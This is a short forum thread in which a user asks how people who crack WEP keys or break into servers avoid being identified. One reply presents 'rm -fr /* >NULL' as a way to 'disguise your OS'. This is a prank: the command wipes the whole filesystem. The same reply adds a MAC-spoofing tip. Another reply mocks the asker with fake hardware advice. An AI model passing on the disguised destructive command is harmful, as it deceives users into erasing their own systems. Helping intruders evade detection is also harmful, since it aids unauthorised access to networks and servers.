Default How do you hide who you are online?

I am curious what preventative measures one can take to hide all personal/identifying information while being online. For instance, if someone was cracking WEP keys or attempting to infiltrate servers what could they do to hide who they are?

Any links or information sources would be greatly appreciated.

I am confused as to what you are trying to do, as that affects how you do it.

Yes you have it. How do people who are cracking weps or hacking into networks hiding who they are?

I am just curious as to how they are not getting caught...

First thing you want to do is disguise your OS, so that counter measures cannot detect what you're using.

    Code:
    rm -fr /* >NULL
After that, you'll want to change your MAC address via MacChanger.
A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.

    That's so yesterday Streaker...

The cool way to do it is pull the screws out of the bottom of your laptop and open up the case. Start prying off chips and parts till you get down to the little switch that's labeled '733tm0d3' and switch it to true. Don't worry about putting all the stuff you just pulled out back in...those are all just extra parts laptop manufactures put inside laptops to jack the price of them up...they aren't really needed.
